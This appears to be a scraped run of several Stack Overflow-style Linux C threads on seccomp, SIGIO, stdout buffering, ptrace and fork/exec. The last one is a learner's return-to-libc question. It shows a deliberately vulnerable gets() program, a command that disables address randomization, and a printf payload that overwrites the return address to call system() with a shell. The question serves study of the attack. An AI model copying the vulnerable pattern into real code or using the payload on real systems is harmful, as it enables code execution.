Why does a process that has gone into seccomp mode always get killed on exit?
$ cat simple.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>   /* declares prctl() and PR_SET_SECCOMP */

int main(int argc, char **argv)
{
    printf("Starting\n");
    prctl(PR_SET_SECCOMP, 1);   /* 1 == SECCOMP_MODE_STRICT */
    printf("Running\n");
    exit(0);
}
$ cc -o simple simple.c
$ ./simple || echo "Returned $?"
Starting
Running
Killed
Returned 137
From the man page, under PR_SET_SECCOMP: in strict mode (the mode 1 requested here), the only system calls the process is allowed to make are read(2), write(2), _exit(2), and sigreturn(2).
When you call exit(0) in the C standard library (on recent Linux/glibc), it issues the exit_group system call, not exit. That call is not on the allowed list, so the kernel kills the process with SIGKILL.
(You can see this if you strace the process...)
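A minimal sketch of a workaround, assuming glibc on Linux: bypass the library wrapper and make the raw exit system call (which strict seccomp does allow) via syscall(2):

#include <stdio.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
    printf("Starting\n");
    prctl(PR_SET_SECCOMP, 1);   /* SECCOMP_MODE_STRICT */
    printf("Running\n");
    fflush(stdout);             /* write(2) is still permitted */
    syscall(SYS_exit, 0);       /* raw exit, not glibc's exit_group */
    return 0;                   /* not reached */
}

This should exit cleanly instead of being killed, because the only system calls made after entering strict mode are write and exit.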
Related
Think of this as a continuation of the good advice here:
https://stackoverflow.com/a/56780616/16739703
except that I am hoping not to modify the child process.
Edit: I have written code which minimises to:
#include <errno.h>
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[], char *envp[]) {
    /* Enable SIGIO delivery on stdin, owned by this process (inherited across exec). */
    int init_flags = fcntl(0, F_GETFL, 0);
    if (fcntl(0, F_SETFL, init_flags | O_ASYNC)) {
        perror("fcntl(0, F_SETFL, ...|O_ASYNC)");
        exit(1);
    }
    if (fcntl(0, F_SETOWN, getpid())) {
        perror("fcntl(0, F_SETOWN, ...)");
        exit(1);
    }
    if (execve(argv[1], argv + 1, envp)) {
        perror("execve");
        exit(1);
    }
    return 1;
}
and this makefile:
all: morehup
CFLAGS=-g -D_GNU_SOURCE
LDFLAGS=-g
so that, with this procedure:
parent> export TMPDIR="$(mktemp -d)"
parent> mkfifo $TMPDIR/fifo
parent> sh
# you get a new shell, probably with a different prompt
parent> exec 7<>$TMPDIR/fifo
# must be opened for both input and output, or the open blocks waiting for a writer
child> TMPDIR=... # as other shell
child> ./morehup <$TMPDIR/fifo /bin/sh -c "while true; do date; sleep 5; done"
# you get a list of dates
parent> exit
child> I/O possible # followed by a prompt, with no more dates
the kernel delivers SIGIO to the child when the parent exits: closing the parent's descriptor makes the FIFO readable (at end-of-file), O_ASYNC turns that into a SIGIO for the owner set by F_SETOWN, and SIGIO's default action ("I/O possible") terminates the process.
The more configurable version is here:
https://github.com/JamesC1/morehup/blob/main/morehup.c
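To watch the mechanism directly rather than relying on the default action, a small test program can install a SIGIO handler and be run in place of /bin/sh. This is only an illustrative sketch under the same assumptions as above (Linux, _GNU_SOURCE for O_ASYNC, stdin redirected from the FIFO); the program name sigio-test is made up for the example:

#define _GNU_SOURCE          /* for O_ASYNC in <fcntl.h> */
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static volatile sig_atomic_t got_sigio = 0;

static void on_sigio(int sig) {
    (void) sig;
    got_sigio = 1;
}

int main(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigio;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGIO, &sa, NULL);

    /* Same setup as morehup, but on our own stdin. */
    int flags = fcntl(0, F_GETFL, 0);
    fcntl(0, F_SETFL, flags | O_ASYNC);
    fcntl(0, F_SETOWN, getpid());

    while (!got_sigio) {
        sleep(1);
        puts("still here");
    }
    puts("SIGIO received: the other end of the FIFO went away");
    return 0;
}

Run it as ./sigio-test <$TMPDIR/fifo in the child shell; when the parent shell exits, the message appears instead of the process dying.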
I have two questions:
What are the chances that adding a modest amount of code will make this work on most of the common *nixes?
Is there a POSIX utility that already does something like this? I.e., am I reinventing the wheel, and if so, what is it called?
This is my program code:
#include <unistd.h>
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <sys/types.h>

void function() {
    srand(time(NULL));
    while (1) {
        int n = rand();
        printf("%d ", n);
        //sleep(1);
    }
}

int main() {
    pid_t pid;
    pid = fork();
    if (pid == 0) {
        function();
    }
}
With the sleep line commented out (as in the code above), the program works fine: it prints a bunch of random numbers, too fast to even see whether they are actually random. But if I remove the comment, the program doesn't print anything and exits (not even the first number, before it gets to the sleep), even though it compiles without warnings or errors with or without the comment.
but if I remove the comment the program doesn't print anything and exits
It does not print, but it does not really exit either. The child process is still running in the background, executing your infinite while loop.
Using your code in p.c:
$ gcc p.c
$ ./a.out
$ ps -A | grep a.out
267282 pts/0 00:00:00 a.out
$ killall a.out
$ killall a.out
a.out: no process found
The problem is that printf does not really print; it only places the data in the output buffer. To force the buffer to be written out, call fflush(stdout).
If you're not flushing, you are relying on the default buffering mode: when stdout is connected to a terminal it is usually line-buffered, so the buffer is flushed whenever you write a newline character. That's one reason why it's preferable to use printf("data\n") instead of printf("\ndata"). See this question for more info: https://softwareengineering.stackexchange.com/q/381711/283695
I'd suspect that if you just leave your program running, it will eventually print. It makes sense that it has a finite buffer and that it flushes when it gets full. But that's just an (educated) guess, and it depends on your terminal.
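A tiny illustration of the difference, as a sketch (assuming stdout is a terminal and therefore line-buffered by default):

#include <stdio.h>
#include <unistd.h>

int main(void) {
    printf("no newline yet");   /* sits in the stdio buffer */
    sleep(3);                   /* nothing visible during this pause... */
    fflush(stdout);             /* ...until we flush explicitly */

    printf("with newline\n");   /* line-buffered: appears immediately */
    sleep(3);
    return 0;
}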
it prints a bunch of random numbers too fast to even see if they are actually random
How do you see whether a sequence of numbers is random? (Playing the devil's advocate.)
I believe you need to call fflush(3) from time to time. See also setvbuf(3) and stdio(3) and sysconf(3).
I guess that if you coded:
while (1) {
    int n = rand();
    printf("%d ", n);
    if (n % 4 == 0)
        fflush(NULL);
    sleep(1);
}
The behavior of your program might be more user friendly. The stdout buffer can hold several kilobytes of output at least, so unflushed text can take a long time to appear.
BTW, I could be wrong. Check by reading a recent C draft standard (perhaps n2176).
At the very least, see this C reference website then syscalls(2), fork(2) and sleep(3).
You need to call waitpid(2) or a similar function for every successful fork(2).
If on Linux, read also Advanced Linux Programming and use both strace(1) and gdb(1) to understand the behavior of your program. With GCC don't forget to compile it as gcc -Wall -Wextra -g to get all warnings and debug info.
Consider also using the Clang static analyzer.
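Putting that advice together, a corrected sketch of the original program might look like the following (my assumption of the intent: the parent should wait for the child, and the output should be newline-terminated or flushed; the loop is bounded only so the demo ends):

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

static void function(void) {
    srand(time(NULL));
    for (int i = 0; i < 10; i++) {     /* bounded loop so the demo ends */
        printf("%d\n", rand());        /* newline: flushed on a line-buffered terminal */
        fflush(stdout);                /* flush explicitly in case stdout is a pipe */
        sleep(1);
    }
}

int main(void) {
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        return EXIT_FAILURE;
    }
    if (pid == 0) {                    /* child */
        function();
        _exit(EXIT_SUCCESS);
    }
    waitpid(pid, NULL, 0);             /* parent waits instead of exiting early */
    return EXIT_SUCCESS;
}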
I am looking for a ptrace() call to observe a process until the process exits.
I have this which compiles with gcc / cc on OSX:
#include <sys/types.h>
#include <stdint.h>     /* for intmax_t */
#include <stdlib.h>
#include <sys/wait.h>
#include <stdio.h>
#include <sys/ptrace.h>

int main(int argc, char *argv[]) {
    pid_t pidx = atoi(argv[1]);
    printf("pid = %jd\n", (intmax_t) pidx);
    ptrace(PT_ATTACHEXC, pidx, 0, 0);
    wait(NULL);
}
However, even with a valid/existing pid, this program still exits immediately. I want it to exit only after pidx dies.
Is this possible somehow?
Ideally I want something that works on both OSX and Linux.
Your problem is probably that the wait call returns immediately, because the traced "inferior" process is suspended, you know, waiting for you to debug it. You're going to need some kind of loop in which you make ptrace requests to inspect the child and then resume execution, and then call wait again to wait for it to suspend on the next breakpoint or whatever. Unfortunately the debugger API is extremely non-portable; you will have to write most of this program twice, once for OSX and once for Linux.
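For the Linux side, a sketch of that loop might look like the following (assuming you only want to block until the tracee exits, not inspect it; PTRACE_ATTACH/PTRACE_CONT are the Linux request names, and error handling is minimal):

#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>

int main(int argc, char *argv[]) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <pid>\n", argv[0]);
        return 1;
    }
    pid_t pid = (pid_t) atoi(argv[1]);

    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1) {
        perror("ptrace(PTRACE_ATTACH)");
        return 1;
    }

    for (;;) {
        int status;
        if (waitpid(pid, &status, 0) == -1) {
            perror("waitpid");
            return 1;
        }
        if (WIFEXITED(status) || WIFSIGNALED(status)) {
            printf("pid %jd is gone\n", (intmax_t) pid);
            return 0;
        }
        /* The tracee stopped (attach stop, signal delivery, ...): forward the
           signal, if any, and let it keep running until it dies. */
        int sig = WIFSTOPPED(status) ? WSTOPSIG(status) : 0;
        if (sig == SIGSTOP || sig == SIGTRAP)
            sig = 0;                     /* swallow the attach/exec stops */
        if (ptrace(PTRACE_CONT, pid, NULL, (void *)(long) sig) == -1) {
            perror("ptrace(PTRACE_CONT)");
            return 1;
        }
    }
}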
I want to execute a C program in Linux using fork and exec system calls.
I have written a program msg.c and it's working fine. Then I wrote the program below as msg1.c and compiled it to a.out.
When I run ./a.out msg.c, it just prints msg.c as output instead of executing my program.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>     /* for fork */
#include <sys/types.h>  /* for pid_t */
#include <sys/wait.h>   /* for wait */

int main(int argc, char **argv)
{
    /* Spawn a child to run the program. */
    pid_t pid = fork();
    if (pid == 0) {
        /* child process */
        // static char *argv[] = {"echo", "Foo is my name.", NULL};
        execv("/bin/echo", argv);
        exit(127);   /* only if execv fails */
    }
    else {
        /* pid != 0; parent process */
        waitpid(pid, 0, 0);   /* wait for child to exit */
    }
    return 0;
}
argv[0] contains your program's name and argv[1] is msg.c; you are handing that whole vector to /bin/echo, which simply prints its arguments.
It works flawlessly ;-)
/bin/echo msg.c will print msg.c as output. If you want to execute your compiled msg binary instead, change the call to something like execv("path/to/msg", args), where args is the argument vector for msg.
Your exec executes the program echo, which prints out whatever argv's value is.
Furthermore, you cannot "execute" msg.c if it is a source file; you have to compile it first (gcc msg.c -o msg) and then exec the resulting msg binary.
C programs are not executables (unless you use an uncommon C interpreter).
You need to compile them first with a compiler like GCC, so compile your msg.c source file into a msg-prog executable (using -Wall to get all warnings and -g to get debugging info from the gcc compiler) with:
gcc -Wall -g msg.c -o msg-prog
Take care to improve msg.c until you get no warnings.
Then, you might want to replace your execv in your source code with something more sensible. Read execve(2) and execl(3) and perror(3). Consider using
execl ("./msg-prog", "msg-prog", "Foo is my name", NULL);
perror ("execl failed");
exit (127);
Read Advanced Linux Programming.
NB: You might name your executable just msg instead of msg-prog ....
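Putting the pieces together, a sketch of what the fixed caller might look like (assuming the compiled binary is ./msg-prog, as above):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

int main(void)
{
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        return EXIT_FAILURE;
    }
    if (pid == 0) {
        /* child: run the compiled program, not its source file */
        execl("./msg-prog", "msg-prog", "Foo is my name", (char *) NULL);
        perror("execl failed");   /* reached only if execl fails */
        _exit(127);
    }
    int status;
    waitpid(pid, &status, 0);     /* parent waits for the child to finish */
    if (WIFEXITED(status))
        printf("child exited with status %d\n", WEXITSTATUS(status));
    return EXIT_SUCCESS;
}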
I'd like to learn how return-to-libc attacks work, so I have written a vulnerable program that lets me overwrite a function's return address with the address of system(). However, the program doesn't appear to call system(); it just exits cleanly.
Prerequisites
- I'm using Debian Squeeze
- I have disabled address randomization with:
echo 0 > /proc/sys/kernel/randomize_va_space
Vulnerable Code
#include <stdio.h>

void someFunc(void);

void someFunc(void) {
    char buffer[64];
    gets(buffer);
    //puts(buffer);
}

int main(int argc, char **argv)
{
    someFunc();
    return 0;
}
The code is compiled with:
gcc -fno-stack-protector -ggdb -o vuln vuln.c
Using GDB I have determined that:
/bin/zsh is at 0xbffff9b9
system() is at 0xb7ed0000
exit() is at 0xb7ec60f0
Exploit
I exploit it by piping in 72 filler characters, the address of exit(), the address of system(), and the pointer to /bin/zsh, in that order:
printf "%072x\xf0\x60\xec\xb7\x00\x00\xed\xb7\xb9\xf9\xff\xbf" | ./vuln
The program doesn't segfault or execute /bin/zsh.
In GDB
Interestingly, if I change the environment variable to SHELL="/xin/zsh" and run the exploit under gdb, the call to system() does happen:
Cannot exec /xin/zsh
So my questions are:
Have I understood the return to libc attack concept correctly?
Am I piping the malicious code in the correct way and order?
Why does it appear to work in GDB, but not in the shell?
(I've already read return to libc works in gdb but not when running alone)